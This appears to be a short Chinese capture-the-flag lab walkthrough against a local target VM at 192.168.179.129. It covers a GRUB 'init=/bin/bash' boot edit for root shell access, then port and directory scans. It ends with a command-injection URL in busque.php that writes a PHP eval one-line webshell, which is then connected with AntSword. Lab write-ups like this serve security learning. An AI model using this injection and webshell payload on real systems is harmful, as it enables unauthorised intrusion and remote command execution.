第0步：

打开靶机，按下shift，出现下图界面

在此页面按下e键，进入如下界面， 将ro 替换为 rw signie init=/bin/bash

替换完毕后，按下Ctrl键+X键，进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息， 英文键盘的斜杠按不出来，需要按数字键盘的斜杠

第一步：确定靶机IP为192.168.179.129

第二步：扫描后台及开放端口

第三步：进行敏感目录及文件扫描

#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190) 
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190) #端口
192.168.179.129:80
192.168.179.129:21

第四步：访问扫描出来的可能有价值的文件及端口

第五步：发现可以传参的地方，尝试传一个id，得到结果

第六步：进一步，尝试上传一句话木马

#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php

第七步：使用蚁剑进行连接

#URL地址
http://192.168.179.129/site/shell.php

                                                                                                                              FROM  IYU_